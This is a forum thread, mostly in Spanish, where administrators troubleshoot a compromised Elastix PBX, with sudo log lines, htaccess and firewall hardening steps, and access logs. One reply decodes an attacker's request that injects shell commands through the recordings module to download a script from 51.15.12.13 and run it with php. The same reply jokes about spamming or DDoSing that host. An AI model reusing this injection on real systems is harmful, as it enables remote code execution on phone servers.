      Jun 10 02:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 02:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 02:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 02:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 02:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 02:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 02:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 02:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 03:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 03:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 03:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 03:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 03:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 03:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 03:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 03:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 03:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 03:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 03:50:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 03:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 04:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session opened for user cyrus by (uid=0)
      Jun 10 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session closed for user cyrus
      Jun 10 04:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 04:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 04:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 04:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 04:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 04:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 04:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 04:40:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 04:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 04:50:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 04:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 05:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 05:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 05:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 05:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 05:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 05:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 05:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 05:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 05:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 05:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 05:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 05:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 06:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 06:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 06:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 06:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 06:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 06:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 06:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 06:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 06:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 06:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 06:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 06:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 07:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 07:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 07:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 07:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 07:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 07:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 07:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 07:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 07:40:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 07:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 07:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 07:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 08:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 08:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 08:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 08:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 08:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 08:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 08:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 08:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 08:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 08:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 08:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 08:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 09:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 09:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 09:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 09:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 09:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 09:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 09:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 09:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 09:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 09:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 09:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 09:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 10:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 10:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 10:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 10:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 10:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 10:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 10:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 10:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 10:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 10:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 10:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 10:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 11:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 10 11:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus

        striderec

        I did a recursive search for that file and it is only found on /tmp and /var/www/html/_asterisk

        I delete them over and over but they come back...

        I see strange POST commands on the access and ssl_access logs which I have already shared with you..

        Now try to find a script wriyting to those directories

          hello, sorry for me english,
          Hello, I usually put on all servers protected by htaccess to at least thus prevent anyone accessing the web part. I copy what they have to do to ask user and password when accessing issabel (or old elastix), I put it in Spanish because I do not know English well, but I hope you understand.

          Asus clients give them the username and password and with that they can only access via the web those who know

          I hope it helps
          hola, yo suelo poner en todos los servidores protegidos por htaccess para al menos asi evitar que acceda cualquiera a la parte web. les copio lo que deben hacer para que pida usuario y clave al acceder a issabel ( o antiguo elastix), lo pongo en español porque en ingles no se bien, pero espero se entienda.

          Asus clientes les dan el usuario y la clave y con eso solo podran acceder via web quienes lo conozcan

          Espero que les ayude

          en el fichero de configuracion en

          vi /etc/httpd/conf.d/elastix.conf

          en el fichero elastix.conf

          hay que poner algo asi

          Apache-level configuration for Elastix administration interface

          Timeout 300

          Default apache configuration specifies greater limits than these

          #MaxClients 150
          #MaxRequestsPerChild 1000

          Default apache User and Group diretives MUST be commented out

          in order for these to take effect.

          User asterisk
          Group asterisk

          #esto es para preguntar por usuario y clave al entrar por web para mas seguridad

          <Directory "/var/www/html">

          Redirect administration interface to https

          RewriteEngine On
          RewriteCond %{HTTPS} off
          RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI}
          AuthType Basic
          AuthName "Zona Restringida voip"
          AuthUserFile /usr/local/apache/wwwpasswd
          Require user clientes
          </Directory>

          luego e guarda y se ejecuta

          para crear el directorio y usuarios del password solitiado por ejemplo para clientes que es el usuario seria

          El siguiente paso es generar el password con el comando

          mkdir /usr/local/apache
          htpasswd -c /usr/local/apache/wwwpasswd clientes

          Luego solicitara ingresar un password, finalizados estos pasos es necesario reiniciar apache para que tome los cambios

          service httpd restart

          y listo con esto pedira usuario y clave en el puerto 443

            Hello hgmnetwork,
            Thanks for the workaround.

            It is useful for this problem to remove ARI ?

              Para borrarlo si esta infectado no pero no deberia pasar mas una vez limpiado ya que bloquea el acceso http a peticiones sin clave

              If your server are exploit not. If you are delete all files affected and put htaccess not exploit more with http access

              Sorry for me english

                hgmnetwork Gracias por tu consejo, hice lo que recomendaste pero igual pasó lo mismo con tu sugerencia. Parece que es algún script que ya está dentro del sistema que está haciendo esto pero no puedo determinar dónde está aún.

                English version: Thank you for your advice, i did what you suggested but the same happened nonetheless. It looks there it is a script that is already on the server that is running and doing this but I can't determine where it is yet.

                Paul

                  striderec De acuerdo a tus logs el modulo de recordings es el que esta comprometido. A través de ese modulo están descargando los scripts que puedes ver en la URL:

                  POST%20%2Frecordings%2Fmisc%2F%3Fcmd%3Did%3Buname%20-a%3Bcurl%20-ks%20http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt%20%3E%20%2Ftmp%2Fa.out%20%7C%7C%20wget%20http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt%20-O%20%2Ftmp%2Fa.out%20%7C%7C%20GET%20%20http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt%20%3E%20%2Ftmp%2Fa.out%3Bphp%20%2Ftmp%2Fa.out%3Brm%20%2Ftmp%2Fa.out

                  Se traduce en:

                  POST /recordings/misc/?cmd=id;uname -a;curl -ks http://51.15.12.13/t/cmd.txt > /tmp/a.out || wget http://51.15.12.13/t/cmd.txt -O /tmp/a.out || GET  http://51.15.12.13/t/cmd.txt > /tmp/a.out;php /tmp/a.out;rm /tmp/a.out

                  Empieza por bannear todo trafico a la IP 51.15.12.13, el archivo txt codificado lo puedes ver incluso en el browser.

                  Verifica que haya una actualización del modulo de recording o simplemente deshabilitalo.
                  El server esta hosteado en Francia y tiene reportes de abuso contra PBX:
                  https://www.abuseipdb.com/check/51.15.12.13
                  Y aqui hay información de contacto:
                  https://hostingcompass.com/whois/51.15.12.13

                  Por si gustas hacer spam o ddos :)

                  Lo raro si ya tienes bloqueado con htaccess el acceso es que pueda volver a hacerlo mediante get o post por web, imagino que tendrias algun script o fichero metido todavia. En teoria una vez elimines todo lo infectado con el htaccess no te debe volver a pasar al menos si el ataque es por web ( por ejemplo intentan hacer un get o post a cualquier pagina no podran si no tienen usuario y clave del htaccess.

                  En cuanto elimines todo lo problemático dentro del servidor no se te deberia volver a infectar.

                  Otra solucion para buscar posibles ficheros sospechosos es buscar cualquier fichero cuayo ultimo acceso fuera por ejemplo hoy o ayer o el dia x que sepas que te han entrado igual te salen muchos pero te limitara la busqueda

                    navaismo Gracias! Eso mismo estoy haciendo ahora aunque es esa IP en cuestión y otras más.. En realidad acabo de darme cuenta que ponerle password al http como sugirió hgmnetwork si está funcionando, lo que pasa es que me olvidé de un paso en uno de los servidores afectados ya que este es el ssl_access log de un servidor al que trrataron de entrar pero no pudieron:

                    89.249.67.50 - - [13/Jun/2017:05:31:39 -0400] "GET / HTTP/1.1" 401 381
                    213.202.233.77 - - [13/Jun/2017:05:31:39 -0400] "GET /recordings/misc/salem.php HTTP/1.1" 403 227
                    89.249.67.50 - - [13/Jun/2017:05:44:35 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:05:58:07 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:06:11:47 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:06:23:10 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:06:34:36 -0400] "GET / HTTP/1.1" 401 381
                    163.172.68.183 - - [13/Jun/2017:06:34:41 -0400] "GET /a2billing/customer/templates/default/footer.tpl HTTP/1.1" 401 381
                    216.218.206.68 - - [13/Jun/2017:06:45:01 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:06:45:38 -0400] "GET / HTTP/1.1" 401 381
                    216.218.206.68 - - [13/Jun/2017:06:45:46 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:06:56:28 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:07:08:26 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:07:19:34 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:07:31:06 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:07:55:53 -0400] "GET / HTTP/1.1" 401 381

                    Como ves error los intrusos obtienen el error 401 que es UNAUTHORIZED y 403 (FORBIDDEN) no pueden hacer nada. Es una molestia tener que ingresar doble clave (La del servidor Apache y la propia de Elastix / issabel) pero algo que los clientes sabrán entender cuando se les dice que es para evitar intrusos en el sistema.

                    Adicionalmente todo parece indicar que es a través de los scripts de recordings por donde están vulnerando a Elastix como indicaste.

                    striderec En realidad no deberias tener abierto los puertos hacia la WAN. Desde ahí comienza el problema, Tu diseño debe seguir estas preguntas:
                    -- ¿Realmente necesitas abrir puertos?
                    -- Si tienes que abrir puertos, solo se hace a IP conocidas.
                    -- Si las IPs son dinamicas una VPN soluciona el problema.

                    Es regla básica jamás abrir puertos a la WAN sin un filtro o sin VPN precisamente por lo que te ha pasado. Lo mejor es reinstalar el PBX ya que no has podido identificar si hay script en el server.

                      navaismo Generalmente sólo abro el PBX a las IPs mías (oficina, casa, IPs fijas del cliente si las tuviera), tengo el módulo anti hacker y el firewall activo para evitar esto pero como sabemos todos los hackers siempre se las ingenian para ver cómo entran.

                      La VPN es buena idea pero desafortunadamente sirve sólo para instalaciones "en el sitio" (locales) las cuales en el caso particular de mi negocio casi no tengo ya que a la mayoría de mis clientes les gusta la idea de tener algo hosted fuera de su oficina o en la nube y el 95% de mi clientela tiene Elastix virtualizados con VMWare ESXi 6.5 desde mi centro de datos por lo cual la VPN no es solución adecuada debido a una razón simple: Todos mis clientes son extensiones remotas y salvo honrosas excepciones no todos los teléfonos IP tienen cliente VPN incorporado en su firmware para poder conectarlos de esa forma a la red de mi centro de datos..

                      striderec Fijate que por los logs te están haciendo un básico ataque de diccionario para ingresar (todos los POST a / ). Poniendo .htaccess se les hará más complicado (quizas los script kiddies no usan basic http auth y solo automatizan los posts)... o bien tendrán dos claves que adivinar.

                      ARI es un conocido vector de ataque, no estoy seguro de que en la version incluída en Issabel 4 existan las vulnerabilidades en callme.php y similares que parecen haber sido los vectores de ataque en tu caso... es posible que eso esté resuelto, pero no puedo garantizarlo.

                      ARI es uno de los primeros candidatos a ser removido, luego de a2billing que ya fue removido del ISO. A menos que existan usuarios que puedan aportar los parches de seguridad adecuados, lo que posiblemente decidamos sea retirar la funcionalidad (desarrollada por terceros), o forzar capas de autenticación .htaccess. Pero lo ideal a mediano plazo sería reemplazarlo por herramientas propias y más modernas, al igual que FreePBX.

                      Sería bueno armar un equipo de "seguridad" que pueda hacer pruebas y pen testing , o que pueda intentar usar todos los exploits conocidos sobre una instalación fresca.

                      Saludos,

                      asternic Nicolás, apliqué lo indicado por hgmnetwork y por lo menos hasta ahora los potenciales atacantes están recibiendo los errores HTTP 401 y 403 lo cual es positivo hasta el momento. Igual estaré monitoreando mis servidores afectados durante todo el día para saber si así se ven finalmente truncados en sus intentos de ingresar y dañar el acceso GUI de FreePBX.

                      Lo que me preocupa es que http y https están bloqueados en el firewall para IPs que no sean la mía y las fijas de los clientes pero aún sigo viendo intentos de accesar a la central por esos puertos lo cual me deja pensando si algo del firewall de Elastix no está funcionando bien o si no está aplicando las reglas en el orden correcto.

                      Yo entiendo que la prioridad es de número mayor a número menor lo cual significa por ejemplo que la regla #12 se aplica primero que la regla #8 y por ende lo que la regla #8 "libere" viene después de lo que yo haya "bloqueado" en la regla #12. Ejemplo: En la regla #12 de acuerdo al firewall de Elastix he bloqueado http a todo el mundo y en la regla #8 desbloqueo http para 127.0.0.1 y en la #9 desbloqueo http para la IP fija de mi oficina. Si entiendo esta lógica correctamente esta acción debería permitir el paso al puerto http a las IPs de la regla #8 y #9 pero a nadie más. Corríjanme si me equivoco?

                      A mi siempre me ha gustado aportar con reportes de bugs del sistema o con problemas de cualquier índole. Ayuda mucho que yo comercializo elastix virtualizado junto con DIDs y minutos de llamadas locales o internacionales para oficinas y call centers. Estoy día a día monitoreando mis servdores para estar pendiente de cualquier ataque o problema que pueda haber y reportarlo.

                        asternic y por cierto, estos ataques fueron realizados también a instalaciones limpias, nuevecitas de paquete de Elastix 4.0 que se supone tiene CentOS 7 y no el 5.11 que ya está descontinuado. Es decir que el exploit del script está presente incluso en la versión "mas reciente" del antiguo Elastix.

                        striderec Todo lo que puedas reportar es más que bienvenido. Con respecto a las reglas de firewall, lo único que puedo sugerir es que las veas en consola, no por web:

                        iptables -vnL

                        Y ahí podrás verificar el orden de las mismas. Elastix 4 tiene muchos bugs debido a la intriducción de Centos 7, incluído el que NO INICIALIZA el firewall aunque en el GUI diga que si. Y el GUI no comprueba nunca si el firewall (iptables), está corriendo o no.

                        El comando de arriba te va a mostrar si hay reglas o no creadas.

                        Issabel 4 ha cambiado mucho de lo que fue Elastix 4:

                        FreePBX fue forkeado a IssabelPBX en su version 2.11.43 (esa versión corrige muchos de los exploits de freePBX).
                        Hemos corregido el bug anteriormente mencionado con el firewall y además muestra en GUI el estado real.

                        Hemos comprobado que hay exploits no reportados/conocidos en A2Billing, por lo que lo hemos removido del .iso y próximamente de los repositorios de modo preventivo.

                        Es posible que existan otros exploits in freePBX (IssabelPBX ahora), o en el código que era de Elastix, y estamos trabajando proactivamente para resolver/minimizar incidencias.

                        En la próxima semana anunciaremos la versión estable de Issabel 4, y te pediremos entonces que puedas al menos migrar uno de tus sistemas (si tienes tiempo y ganas, puedes hacerlo con nuestra versión de desarrollo esta misma semana), para luego monitorear este nuevo sistema y veas si es atacado y exploiteado.

                        Si quieres experimentar con la iso de Issabel 4, dime por privado y te hago llegar un link para que lo pruebes.

                        Saludos,

                        Estuve sufriendo el mismo ataque, todos los días a las 00:22 se elminaban varios archivos, lo mitigue con un script que recupera desde un backup anterior los archivos afectados. También bloqueé todo el tráfico https que por error había quedado expuesto a la pública y eliminé el file magnito.php que sólo se encontraba en el directorio _asterisk, curiosamente con fecha de Octubre de 2015 que es la de instalación de la central. Por ahora desde hace una semana que no tengo inconvenientes y por si acaso también eliminé el directorio /usr/src/a2billing.